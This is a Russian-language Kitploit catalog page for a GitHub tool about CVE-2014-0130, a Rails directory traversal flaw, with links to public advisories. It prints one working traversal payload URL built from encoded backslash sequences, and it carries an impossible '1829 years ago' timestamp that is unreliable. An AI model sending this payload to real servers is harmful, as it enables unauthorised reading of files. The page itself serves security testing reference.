Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2014-0130 — cve-2014-0130 rails directory traversal vuln | Kitploit
Инструменты/GitHubGitHub/omarkurt/cve-2014-0130
ReconnaissanceVulnerability AnalysisWeb Application ExploitationInformation GatheringPenetration Testing
GitHubomarkurt/cve-2014-0130

cve-2014-0130

cve-2014-0130 rails directory traversal vuln

Репозиторий
1829 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

== CVE-2014-0130 Тест-кейс

Полезная нагрузка : http://site/api/%5C../%5C../%5C../%5C../%5C../{{CAT_DIR}}

=== Netsparker обнаружено :

https://i.imgur.com/s1vahmj.png

== HackerOne 1 - уязвимость обхода каталогов rails на newrelic.com от droidsec - https://hackerone.com/reports/134032

== Ссылки

  1. http://www.openwall.com/lists/oss-security/2014/05/06/12
  2. http://blog.flowdock.com/2014/05/07/how-we-found-a-directory-traversal-vulnerability-in-rails-routes/
  3. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0130
  4. http://matasano.com/research/AnatomyOfRailsVuln-CVE-2014-0130.pdf
Скачать инструмент